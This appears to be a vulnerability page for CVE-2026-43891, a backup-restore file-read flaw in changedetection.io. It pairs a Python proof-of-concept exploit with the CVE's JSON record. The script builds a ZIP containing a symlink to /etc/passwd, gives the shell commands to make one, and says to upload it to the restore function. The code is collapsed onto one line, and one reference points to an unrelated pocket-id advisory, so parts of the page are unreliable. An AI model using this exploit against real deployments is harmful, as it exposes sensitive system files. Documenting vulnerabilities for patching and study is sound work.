CVE-2026-43891

import zipfile import os # Create a malicious backup structure malicious_dir = 'poc_watch_uuid' os.makedirs(malicious_dir, exist_ok=True) # Create a symlink 'history.txt' pointing to a sensitive file (e.g., /etc/passwd) # Note: This requires creating the zip with symlinks, which needs specific handling or a unix-like environment. # Here is a conceptual Python script to generate such a zip. with zipfile.ZipFile('malicious_backup.zip', 'w') as zf: # In a real exploit, the zip would contain a symlink. # For demonstration, we simulate adding a file that the app might misinterpret or # creating a symlink if the OS allows during zip creation. # Unix example command to create the zip: # ln -s /etc/passwd history.txt # zip -y exploit.zip history.txt # Pythonic way to add a symlink info to the zip: info = zipfile.ZipInfo(os.path.join(malicious_dir, 'history.txt')) info.create_system = 3 # Unix info.external_attr = 0o120777 << 16 # Symlink magic zf.writestr(info, b'/etc/passwd') # The target of the symlink print("Malicious backup 'malicious_backup.zip' created.") print("Upload this file to the changedetection.io restore function.")

{"cve": {"id": "CVE-2026-43891", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:28.493", "lastModified": "2026-05-13T18:23:27.920", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "changedetection.io is a free open source web page change detection tool. Prior to 0.55.1, the vulnerability is caused by trusting attacker-controlled snapshot paths restored from backup files. The vulnerable flow starts in the backup restore logic. When a backup ZIP is restored, the application extracts the archive and copies each restored watch UUID directory directly into the live datastore using shutil.copytree(entry.path, dst_dir). This preserves attacker-controlled files inside the restored watch directory, including history.txt. After restore, the application parses history.txt in the watch history property and returns the contents of the targeted local file. This vulnerability is fixed in 0.55.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-8757-69j2-hx56", "source": "[email protected]"}, {"url": "https://github.com/pocket-id/pocket-id/security/advisories/GHSA-w6p7-2fxx-4f44", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}